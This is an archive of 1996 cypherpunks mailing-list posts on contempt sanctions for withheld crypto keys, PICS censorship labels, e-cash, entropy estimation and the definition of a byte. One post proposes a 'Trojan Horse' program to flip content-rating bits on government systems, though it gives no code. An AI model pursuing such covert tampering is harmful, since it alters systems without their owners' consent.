From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 13 Apr 1996 12:25:33 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 4 April 1996
Message-ID: <01I3GR89SYDY8Y510B@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@elanor.oit.unc.edu"  5-APR-1996 01:25:00.85

>*****************************************************************
>Edupage, 4 April 1996.  Edupage, a summary of news items on information
>technology, is provided three times each week as a service by Educom,
>a Washington, D.C.-based consortium of leading colleges and universities
>seeking to transform education through the use of information technology.
>*****************************************************************

>IBM'S INTELLIGENT MINER DIGS OUT THE GOOD STUFF
>IBM plans to offer companies "data mining" software and services, allowing
>them to make better use of disparate pieces of information stored in their
>computer systems.  The Intelligent Miner software will be available on IBM's
>RS/6000 servers by the fall, and on other platforms by year end.  The
>company also plans to develop Intelligent Decision Server software for local
>area network-based information analysis.  (Investor's Business Daily 3 Apr
>96 A9)

	Anyone have any _specific_ ideas on how their Intelligent Miner system
works? It would appear to be relevant to the identity-spoofing discussions.
	-Allen

>Edupage is written by John Gehl (gehl@educom.edu) & Suzanne Douglas
>(douglas@educom.edu).  Voice:  404-371-1853, Fax: 404-371-8057.  

>Technical support is provided by the Office of Information Technology,
>University of North Carolina at Chapel Hill.

>***************************************************************
>EDUPAGE is what you've just finished reading.  To subscribe to Edupage: send
>mail to: listproc@educom.unc.edu and in the body of the message type:
>subscribe edupage Marilyn Monroe (if your name is Marilyn Monroe;  if it's
>not, substitute your own name).  ...  To cancel, send a message to:
>listproc@educom.unc.edu and in the body of the message type: unsubscribe
>edupage.   (If you have subscription problems, send mail to
>educom@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 13 Apr 1996 11:31:14 +0800
To: JonWienke@aol.com
Subject: Re: Spinners and compression functions
Message-ID: <01I3GRB38EY28Y510B@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I have had a somewhat related idea to this on compression regarding
steaography and which bits are the best ones to use. How about those that a
lossy compression method that's reasonable loses first? These are the ones that
aren't going to be noticed by the viewer, and (if the compression method is
good) will have at least somewhat higher entropy than the rest.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 13 Apr 1996 10:29:52 +0800
To: unicorn@schloss.li
Subject: Re: "Contempt" charges likely to increase
Message-ID: <01I3GRDPKA348Y510B@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn"  6-APR-1996 16:17:13.99

>I might add that the Cayman Islands are full of trust companies with 
>provisions which forbid the disclosure of data to a client who is 
>coerced.  A law on the books refuses to recognize "consent" orders made 
>under judicial compulsion.  This would give the appearance of total 
>unavailability of evidence and suggest the futility of contempt 
>charges.  Yet courts have still, and with no small measure of success, 
>imposed sanctions on witnesses so protected.

	What measure of success? Getting the data, or locking up the witness?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Sat, 13 Apr 1996 17:51:54 +0800
To: cypherpunks@toad.com
Subject: Cryptography Forum - Churchill Club
Message-ID: <v01540b02ad94cdb6e09d@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


Seen in ba.internet. This may be of interest to people living in the San
Francisco area of California.

------------------------------------->8--------------------------------------
Information Security and the 20th Anniversary
of Public Key Cryptography

Monday, April 29, 1996
Marriott Hotel, Burlingame, CA
5:30 PM Full Dinner
6:30 PM Program
Members: $20
Non-members: $35

KEYNOTE SPEAKERS:

Senator Conrad Burns (R, MT)
Senator Larry Pressler (R, SD)
Congressman Robert Goodlatte (R, VA)
David Morris, Vice President, Cylink Corp.
Jim Omura, Chief Technology Officer, Cylink Corp.
James Freeman, Special Agent in Charge, FBI
Phil Mellinger, Chief Engineer, Government Securities Assoc.
Paul Raines, Project Manager, United State Postal Service
Whitfield, Diffie, Martin, Hellman and Ralph Merkle - Pioneers and
original patent holders for public key cryptography

Economic espionage is costing the nation billions of dollars in lost
business every year.  U.S. companies are in danger of losing everything
from trade secrets and proprietary financial information , to the bottom
line figures on contract bills.  Three bills are now in Congress to
protect government, business and home computer users from outside
snooping of sensitive information.  These proposed new laws have been
written to encourage the use of encryption and loosen export
restrictions on encryption technology.  Congressman Goodlatte is the
author of one of these bills.  April 1996 is also the 20th anniversary
of the creation of Public Key Cryptography.  The three principal
pioneers and patent holders will also be present to share their views on
the need for strong encryption.  Morris of Cylink Corp. will provide an
overview of what state-of-the-art security solutions are needed, and
available, to truly protect business from unauthorized access.  James
Freeman of the FBI will discuss the recent study on industrial espionage
and Paul Raines from the U.S. Postal Service will talk about electronic
postmarking and certificate authority key registry bureau.

TO REGISTER:

Please call (408) 371-4460
or fax reservations (408) 371-4180
or email chrchllclb@aol.com

PRESENTED BY THE CHURCHILL CLUB - A NON-PARTISAN FORUM FOR SILICON
VALLEY

------------------------------------->8--------------------------------------


-------------------------------------------------------------------------
Steven Weller                      |  Weller's three steps to Greatness:
                                   |     1. See what others cannot
                                   |     2. Think what others cannot
stevenw@best.com                   |     3. Express what others cannot






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 13 Apr 1996 14:47:06 +0800
To: frantz@netcom.com
Subject: Re: PICS required by laws
Message-ID: <01I3GRMTAVBQ8Y510B@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frantz@netcom.com"  6-APR-1996 16:21:56.32

>I am less worried about this possibility than most.  PICS scrubbers will be
>as easy to produce as any other web intermediary.  (e.g. The one which
>replaces "bad" words with "censored".)

	Quite... as will ones that flip-flop the various packet bits that
people are discussing. 

>I do not make these comments publicly, because I don't want to poke holes
>in network self censorship while the courts are grinding on the CDA.  (Note
>that true self censorship, where the viewer wants the filtering would not
>be impacted.  Those viewers would just not use that kind of intermediary.)

	I don't plan on mentioning it on CuDigest, either... just that any
imposition of this standard will leave countries where it isn't imposed.

> I applaud the ACLU's position in not rating their web page.  I will also
>note that it is possible for a PICS filter to refuse to pass unrated pages.

	Yes... and it would be possible for a PICS unrating filter to simply
set all of them to child-OK. With the current discussion of packet-based
censorship, it would appear possible for the bit in question to be reset by
_any_ of the systems it passes over at least as easily as those systems could
use this bit for filtration. I would suggest a "Trojan Horse" program to do
this, in order to A. get governmental systems and B. give SYSOPs an excuse to
run the flipping program.
	This flipping could produce either child-visible or child-invisible
material, depending on what result the system in question wished to produce.
Child-visible would help the children; child-invisible would make the Net
unusable for children whose parents weren't sensible enough to not use such
software. The latter, applied to technical material, would also drive China,
Singapore, et al nuts.  

> If much of the technical information on the net is unrated, China,
>Singapore etc. will be between a rock and a hard place with the
>anti-censorship intermediaries.

	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 13 Apr 1996 18:35:19 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: What can the judge do to me?
In-Reply-To: <199604122207.SAA08791@netcom13.netcom.com>
Message-ID: <Pine.SUN.3.91.960412193031.27436E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



An unnamed cypherpunk asked:

> I was just wondering how/if [International Union] fit[s] in with frequent 
>claim 'the judge can throw away the key' if he wants......

c'punks -

I've been involved in a private discussion with a list reader about 
the extent to which courts can impose contempt fines and sanctions.  I 
thought I would post the results to the list as many have expressed 
interest in the ways that courts might try to compel production of 
crypto keys or compel offshore e-cash institutions.  The bulk of my 
answer follows.

The key to limiting the ability of a court to summarily enter contempt 
sanctions has always been the classification of the sanctions.  
"Criminal" sanctions, may entitle the witness to a trial by jury. "For 
'serious' criminal contempts involving imprisonment of more than six 
months, these [procedural] protections include the right to jury 
trial. "  International Union, United Mine Workers of America, et al. 
v. Bagwell et al., 114 S. Ct. 2552 (1993)(hereinafter, International 
Union)(citing Bloom, 391 U.S., at 199; Taylor v. Hayes, 418 U.S. 488, 
495, 41 L. Ed. 2d 897, 94 S. Ct. 2697 (1974)).  "Civil" sanctions do 
not require such protections and can be imposed on the spot and 
without review.  "...civil contempt sanctions, or those penalties 
designed to compel future compliance with a court order, are 
considered to be coercive and avoidable through obedience, and thus 
may be imposed in an ordinary civil proceeding upon notice and an 
opportunity to be heard. Neither a jury trial nor proof beyond a 
reasonable doubt is required."  International Union, supra.

The court in International Union also makes a distinction between 
"direct" and "indirect" contempts.  "Direct contempts that occur in 
the court's presence may be immediately adjudged and sanctioned 
summarily."  International Union, supra.  These would certainly 
include refusing to reveal non-privileged information on the stand, 
and may include the refusal to reveal the passphrase to a crypto key 
while on the stand.

The court also recognizes that the indefinite confinement option is 
available to judges.  Specifically, "[t]he paradigmatic coercive, 
civil contempt sanction, as set forth in Gompers, involves confining a 
contemnor _indefinitely_ until he complies with an affirmative command 
such as an order "to pay alimony, or to surrender property ordered to 
be turned over to a receiver, or to make a conveyance." International 
Union, supra (emphasis added)(citing Gompers, 221 U.S., at 442).  See 
also, McCrone v. United States, 307 U.S. 61, 64, 83 L. Ed. 1108, 59 S. 
Ct. 685 (1939) (failure to testify).  Shillitani v. United States, 384 
U.S. 364, 370, n. 6, 16 L. Ed. 2d 622, 86 S. Ct. 1531 (1966) 
(upholding as civil "a determinate 24 month sentence which includes a 
purge clause").

My favorite language from the court defining such sanctions is this:  
"In these circumstances, the contemnor is able to purge the contempt 
and obtain his release by committing an affirmative act, and thus 
"carries the keys of his prison in his own pocket."  International 
Union, supra (citing Gompers, 221 U.S., at 442, quoting In re Nevitt, 
117 Fed. 451 (1902)).  The court goes on:  "A contempt fine 
accordingly is considered civil and remedial if it either 'coerces the 
defendant into compliance with the court's order, [or] . . . 
compensates the complainant for losses sustained.'"  International 
Union, supra (quoting United States v. United Mine Workers of America, 
330 U.S. 258, 303-304).  And, "Where a fine is not compensatory, it is 
civil only if the contemnor is afforded an opportunity to purge."  
International Union, supra, (citing Penfield Co. v. SEC, 330 U.S. 585, 
590, 91 L. Ed. 1117, 67 S. Ct. 918 (1947)).

And on per diem fines, "Like civil imprisonment, such fines exert a 
constant coercive pressure, and once the jural command is obeyed, the 
future, indefinite, daily fines are purged."  International Union, 
supra.

The court makes a point to justify severe sanctions where testimony is 
sought, or the proceedings are threatened.  "The necessity 
justification for the contempt authority is at its pinnacle, of 
course, where contumacious conduct threatens a court's immediate 
ability to conduct its proceedings, such as where a witness refuses to 
testify, or a party disrupts the court... [t]hus, petty, direct 
contempts in the presence of the court traditionally have been subject 
to summary adjudication, 'to maintain order in the courtroom and the 
integrity of the trial process in the face of an 'actual obstruction 
of justice.'"  International Union, supra (quoting Codispoti v. 
Pennsylvania, 418 U.S., at 513 and citing numerous other sources).

Most interesting to the crypto crowd:

"Contempts such as failure to comply with document discovery, for 
example, while occurring outside the court's presence, impede the 
court's ability to adjudicate the proceedings before it and thus touch 
upon the core justification for the contempt power....  Similarly, 
indirect contempts involving discrete, readily ascertainable acts, 
_such as turning over a key_ or payment of a judgment, properly may be 
adjudicated through civil proceedings since the need for extensive, 
impartial fact-finding is less pressing."  International Union, supra 
(emphasis added).

Hence, International Union preserves very broad contempt sanctions 
which can be imposed without much review provided they fall into a 
rather wide "civil" categorization, rather than a "criminal" one.

I think it's clear, the court literally spells this out, that holding 
a witness indefinitely until he complies with court orders is within 
the discretion of a judge.  Compelling through sanctions the 
production of a "key" (though I'm not sure a crypto key is directly 
contemplated) is likewise clearly permitted.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 13 Apr 1996 17:36:39 +0800
To: jimbell@pacifier.com
Subject: Re: "Contempt" charges likely to increase
Message-ID: <01I3GRYEA2HC8Y510B@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jimbell@pacifier.com"  "jim bell"  7-APR-1996 03:10:38.36

>Over time, technology is dramatically increasing our protections:  From 
>locks to alarms to monitoring systems to remote cameras, with bank accounts 
>that are secure from ordinary criminals, we are becoming less and less 
>dependant on government for our security.  Since the ostensible purpose of 
>courts is nominally to protect us, if those protections begin to be replaced 
>by technology the logical conclusion is that courts will become less 
>numerous and less powerful.  The problem is, that isn't happening, and the 
>reason is that organizations tend to act in ways to protect their own power 
>and influence.  In fact, the average citizen is subject to far more theft of 
>his assets BY THE GOVERNMENT than by common criminals, so at some point we 
>have to realize that the government is now a net problem, rather than being 
>a net solution.

	Quite. I can see clear justifications for, say, allowing whatever money
is spent on private security as a tax deduction. Unfortunately, the PC
egalitarian types who don't seem to realize that inequality is a fact of life
will claim that this will give the poor worse security than the rich. Yes...
and the rich are the ones who need the most security. One, they're the banks:
they're where the money is. Two, the rich tend to be the smarter ones, and thus
the most valuable.

>I think that most crimes that subpoenas  would normally be used for are 
>probably not crimes at all, and are probably "malum prohibitum," not "malum 
>in se" crimes. And in the future, they would likely be used to harass 
>political enemies, as harassment was done in the 1950's and 60's.   This 
>means, for anybody of a libertarian bent, that it would actually be better 
>if the government could be rendered incapable of enforcing them.  Naturally, 
>governments and courts will resist, but that will be irrelevant.

	I would guess that most instances of violations of banking secrecy,
wiretaps, et al fall into this category also.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 13 Apr 1996 14:51:16 +0800
To: weidai@eskimo.com
Subject: Re: the cost of untracability?
Message-ID: <01I3GS5RCZX28Y510B@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"weidai@eskimo.com"  "Wei Dai"  7-APR-1996 10:52:52.30

>I think you're right.  There is no need for the issuer to pay explicit
>interest.  The easiest way to eliminate signorage would be to steadily
>increase the value of each denomination of ecash.  It would be kind of
>like a mutual fund that doesn't pay dividends.  In fact, if the ecash is
>backed by a portfolio of investment securities and its value floats with
>the value of the portfolio, then it would be almost exactly like a mutual
>fund.

	Another method would be for ecash to have a label on it as to when the
issuer would redeem it. Until then, if you want cash from it, find someone else
to trade to. This has the interest advantage for the purchaser, and the
advantage to the issuer that they won't have to worry about when someone will
redeem it. They'll know that they'll need to have a particular amount on a
particular date, and their earnings/losses up until that point can vary all
over the place without being worried about whether they can make their
payments. Ideal for a startup business.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkmoore@iol.ie (Richard K. Moore)
Date: Sat, 13 Apr 1996 16:03:33 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Protocols at the Point of a Gun
Message-ID: <v02110134ad945a3a8bff@[194.125.43.36]>
MIME-Version: 1.0
Content-Type: text/plain



4/11/96, Bill Stewart wrote:
>There are serious technical problems with the suggestion that labelling packets
>as "Adult" or "Child" using IP options and filtering at ISPs for censorship.

        IMHO, the technical problems can somehow be solved, whether we like
it or not, although it will probably be botched intentionally or otherwise.
It's tougher than most protocol upgrades, but easier than was designing
X.400 (just to give some GROSS bounds to the problem).

        My (simplistically presented) suggestion in such a scheme would be
that we don't want a "flag" on packets: we want two "fields":
        - content-classification field in packets:
                _roughly_ analogous to a dewey-decimal number -- says a lot (?)
                about the content, not merely which end of the library it
                goes in

        - user-classification field appended to user-id's:
                a micro-bio of the user -- says something
                about age, languages known, interests


        Before you flame -- I'm not thinking about the potential abuses,
I'm thinking about the useful applications: more useful filtering based on
such fields can be installed as agents on:
        - user machine
        - "dial-in" network node
        - retrieval engines
        - database engines


        "A great project is only a little harder than a good project" - A Kay

Regards,
-rkm
(not on cypherpunks)


~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~--~=-=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~
    Posted by Richard K. Moore  -  rkmoore@iol.ie  -  Wexford, Ireland
     Cyberlib:  www | ftp --> ftp://ftp.iol.ie/users/rkmoore/cyberlib
 ~=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~--~=-=-=-=-=-=-=-=-=~=-=-=-=-=-=-=-=-=~
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 13 Apr 1996 22:23:06 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <01I3GPGIWMLG8Y50UU@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.91.960412194208.27436H-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Apr 1996, E. ALLEN SMITH wrote:

> From:	IN%"unicorn@schloss.li"  "Black Unicorn"  5-APR-1996 06:26:05.96
> 
> >There are ways to resist compelled discovery.  These are not they.
> 
> 	Any methods you're willing to mention sans a money order?
> 	-Allen 

The work I posted discusses many and weighs their strengths and weaknesses.

Generally, and not that I would support the obstruction of justice, the 
key to resisting any coercion is not to leave anything valuable in the 
reach of the coercer.

As an example, if you live in the U.S., and your freedom is valuable to you, 
you're vulnerable.

If you own a house in the U.S., if you hold accounts in your real name in 
the U.S., if you work for an employer who is in the jurisdiction of the 
U.S., or if you have assets or an employer in any jurisdiction which has 
judicial recognition or information shring treaties with the U.S., you're 
vulnerable.

Shooting judges, if the above aren't satisified and if you're in a 
jurisdiction which extradites for murder, is only going to get you in deeper.

I might add that U.S. courts won't refuse to subject you to process 
because you were brought into the U.S. against your will, or in violation 
of international or local law.  Even non-cooperative jurisdictions won't 
always save you.  (Don't fly over or sail into international 
airspace/waters either).

There was a great article in Fortune about a historic tax fugitive that 
can show you how the U.S. can "getcha."  If your interested, I'll dig up 
a pointer.

Generally speaking, if you really need significant asset and judgment 
protection, seek the advice of a professional.  Professionals may be 
expensive, but if they will be cheaper than asset forfeiture consider 
consulting them.

I cannot recommend that you venture out on asset concealing or protection 
schemes without professional advice, no more that I could suggest you do 
your complicated tax work without professional advice.

I'll remind everyone that tax evasion and money laundering are illegal in 
the United States.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 13 Apr 1996 15:24:10 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: "Contempt" charges likely to increase
In-Reply-To: <01I3GRDPKA348Y510B@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.91.960412195749.27436I-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Apr 1996, E. ALLEN SMITH wrote:

> From:	IN%"unicorn@schloss.li"  "Black Unicorn"  6-APR-1996 16:17:13.99
> 
> >I might add that the Cayman Islands are full of trust companies with 
> >provisions which forbid the disclosure of data to a client who is 
> >coerced.  A law on the books refuses to recognize "consent" orders made 
> >under judicial compulsion.  This would give the appearance of total 
> >unavailability of evidence and suggest the futility of contempt 
> >charges.  Yet courts have still, and with no small measure of success, 
> >imposed sanctions on witnesses so protected.
> 
> 	What measure of success? Getting the data, or locking up the witness?
> 	-Allen

Getting the data.  If the IRS or a private plaintiff wants it bad enough, 
they can usually get their hands on it, or at least find out where it is.

The government of the United States doesn't play "fair" when they want 
something.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Mott <thecrow@iconn.net>
Date: Sat, 13 Apr 1996 15:51:56 +0800
To: cypherpunks@toad.com
Subject: Known Plaintext attacks on symmertric algorithms
Message-ID: <316EF0D7.3B80@iconn.net>
MIME-Version: 1.0
Content-Type: text/plain


Now maybe I have this all wrong, but it is my understanding that a known 
plaintext attack is when the cracker knows part of the plaintext of an 
encrypted file.  Then he/she uses that and runs the inverse of the 
algorithm to calculate the key.
  Whether or not I am right about what known plaintext means, isn't the 
entirely possible on all of the symmetric algorithms out there? If I 
grab a file that I know is, say, a standard credit card transaction 
form, and I know what the first 256 bytes are because they are always 
the same, shouldn I always be able to find the entire key that 
corresponds with those 256 bytes? (assuming the key is 2048 bits or 
less) And then with that key decrypt the whole file?
  Maybe I am missing something but it seems that all the symmetric 
algorithms are vulnerable to this, and I thought of a fix, but it 
involves having two keys (or one thats twice as big)
-- 
thecrow@iconn.net
"It can't rain all the time"

RSA ENCRYPTION IN 3 LINES OF PERL
---------------------------------------------------------
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Sat, 13 Apr 1996 20:37:30 +0800
To: "cypherpunks@toad.com>
Subject: RE: Entropy Estimator
Message-ID: <01BB28AF.778AE600@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


> them.  So far, the results have been consistent within 20%.  EXE's show 3-4
> entropy bits/byte, ZIP files show 6-7, and DLL's and text files show 1-2.

Hmm... EXEs have twice the average entropy of DLLs??

The structural difference between an EXE and a DLL is
a single flag in the header.  I suspect that either your sample
inputs are highly non-representative or your algorithm for
estimating entropy is badly flawed.

regards,
-Blake





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 13 Apr 1996 12:33:45 +0800
To: cypherpunks@toad.com
Subject: Re: Protocols at the Point of a Gun
Message-ID: <v02120d00ad94ab019591@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


How fortuitous!

At 8:09 PM 4/12/96, Marshall Clow wrote:

> However, given the hysteria that is surrounding the CDA, etc., I think
>that
> the second option would be "politically unacceptable". The whole thrust [
> sorry for the sexual imagery ;-) ] behind [ oops, now it's sodomy ] the
>CDA
> is that it's not good enough for parents to take responsibility for their
> children's use; the government must be involved.

Yeah. What *he* said.

Actually, this gratuitous waste of bandwidth brought to you by my new .sig,
courtesy of my samoan attorney, one Vincent Moscaritolo. Vinnie, to his
friends...

Cheers,
Bob Hettinga

Note new .sig!
\|/ \|/ \|/
 V   V   V

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they just passed a few more laws, we could all be criminals." --Vinnie
Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 13 Apr 1996 14:29:19 +0800
To: cypherpunks@toad.com
Subject: Re: Entropy Estimator
Message-ID: <ad946a8a010210047a9a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:06 PM 4/12/96, rick hoselton wrote:
>At 12:19 AM 4/12/96 -0400, JonWienke@aol.com wrote:
>
>>I just added a feature to my entropy graphing program that
>>estimates the number of bits of entropy in the file,
>
>Hey, that's just what I need.  I have these two 8-million byte
>files.  One is a recording made by a geiger counter, every bit
>is uncorrelated with anything else in the universe and each bit
>is equally likely to be a one or a zero.  The second file is an
>IDEA encryption of all the four-byte numbers
>from one to two-million.
>
>Here's my problem.  I can't remember which file is which, and I've
>forgotten sixty-four bits of the key I used to produce the encrypted file.
>
>That's where your technique come in.  The first file has sixty-four
>million bits of entropy.  The second file has only sixty-four bits
>of entropy, total (the missing key bits).  Surely, your technique can
>tell me which file is which.

No, this is not the case. Suppose your file of 64 million bits of entropy
is stored as "Rick's Geiger Counter File," perhaps on your Web site. (Great
for use by various people as a "virtual one time pad" (patent pending).)

A year or so from now someone asks a program to measure the entropy of this
file. Nearly all programs will report that the file has lots of bits of
entropy...

However, is this the "true" entropy? A clever program, or a person, might
well remember that this file is Rick's Geiger Counter File, making the bits
_very_ predictable (or, equivalently, little "surprise," low entropy, great
compressibility, etc.).

Once again, one can never know for sure that a file, sequence, string is
maximally compressed.

The application to your stated problem is that the two files might very
well have similar statistics (a good cryptographic hash function is likely
to produce a regular output, for example) and that a program cannot tell
which one is the "really random" file and which is the "seemingly random"
file is not a failing of the program, necessarily, but is implicit in some
inevitable limitations of all programs.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 13 Apr 1996 13:57:16 +0800
To: cypherpunks@toad.com
Subject: Re: Answer about bits and bytes
In-Reply-To: <199604122104.OAA01053@mycroft.rand.org>
Message-ID: <kTuamD31w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Gillogly <jim@ACM.ORG> writes:
> jim bell <jimbell@pacifier.com> writes:
> >See, I do not challenge the fact that there were plenty of data objects of
> >length other than 8-bits.  The issue is whether or not the people back then
> >actually believed that a correct, official usage of the term "byte" included
> >lengths other than 8.
>
> Reading from the PDP-10 Reference Handbook (DEC, 1971) page 2-30, we read:
>
> 	To conserve memory, it is useful to store data in less than full
> 	36-bit words.  Bytes of any length, from 1 to 36 bits, may be
> 	entered using a BYTE statement.
>
> 		BYTE (N) X,X,X
...

_The Programmer's Guide to the 1802_ (Tom Swan, Hayden Books, 1981) says the
following on p. 19:

    The eight binary digits or bits represented in Fig. 2-1 are commonly
    given the name _byte, and in this book, one byte will always equal
    eight bits. (This is a rather common convention in microcomputing, but
    a byte does not always equal eight bits in much of the published
    literature.) Some books also refer to computer "words," but, since a
    "word" is even more loosely defined than a "byte," we will refrain from
    using it as a label for binary numbers. In addition, to make things
    come out right for eight-bit computers, leading zeros are usually
    written in front of binary numbers so all numbers come out to even
    multiples of eight-bit bytes.

_Assembler Reference Manual for the Sub Workstation, Version 1.0 of
30th November 1982_ (we're talking the Motorola 68K Sun 1 here!) says:

    Many MC68000 machine instructions can operate upon byte (8-bit), word
    (16-bit), or long word (32-bit) data.

They felt it necessary to specify this in a number of places.

A very important book that anyone who programs computers should read --
Donald Knuth, _The Art of Computer Programming_ (Addison Wesley, 1973), v. 1,
p. 120, says the following about the MIX language:

    Words. The basic unit of information is a _byte. Each byte contains an
    _unspecified amount of information, but it must be capable of holding
    at least 64 distinct values. That is, we know that any number between 0
    and 63, inclusive, can be contained in one byte. Furthermore, each byte
    contains _at _most 100 distinct values. On a binary computer a byte
    must therefore be composed of six bits; on a decimal computer we have
    two digits per byte.

    Programs written in the MIX language should be written so that no more
    than sixty-four values are ever assumed for a byte. If we wish to treat
    the number 80, we should always leave two adjacent bytes for expressing
    it, even though one byte is sufficient on a decimal computer. _An
    _algorithm _in _MIX _should _work _properly _regardless _of _how _big
    _a _byte _is. Although it's quite possible to write programs which
    depend on the byte size, this is an illegal act which will not be
    tolerated; the only legitimate programs are those which would give
    correct results with all byte sizes. It is usually not hard to abide by
    these ground rule, and we will thereby find that programming a decimal
    computer isn't so different from programming a binary one after all.

    ...

    _A _computer _word _is _five _bytes _plus _a _sign. The sign position
    has only two possible values, + and -.

Give it up, Jim -- I have more ancient writings than you can shake a dynamite
stick at. :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Sat, 13 Apr 1996 12:37:15 +0800
To: cypherpunks@toad.com
Subject: How the other half lives - why encryption is necessary
Message-ID: <9604130124.AA08230@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


	The following showed up on a public radio-oriented mailing list
I occasionally read - if this is really a true report by a confessed
cordless/cellular scanner freak who got caught taping calls and passing
the tapes around it is certainly illuminating as someone in an official
position may have possibly said much more than more sophisticated law
enforcement eavesdroppers would ever admit to.  Clearly most people
would think the law in the matter was very different than the attitude
here expressed, though I think that many of the more cynical would view
this as no surprise at all and indeed SOP in most investigative
agencies,

	I cannot vouch for the identity of the poster or the veracity of
this.  However I think it certainly shows the official attitude that has
made many of us advocates of encryption, particularly of wireless
communications, and deeply suspicious of the notion that court ordered
wiretaps are the only ones used by the police and other agencies.


Forwarded message: From scan-mass-east-request@nomad.n-reading.ma.us 
Old-Return-Path: <merk!tiac.net!kilo>
Date: Fri, 12 Apr 1996 19:17:41 -0400 
Message-Id: <199604122317.TAA17404@zork.tiac.net>
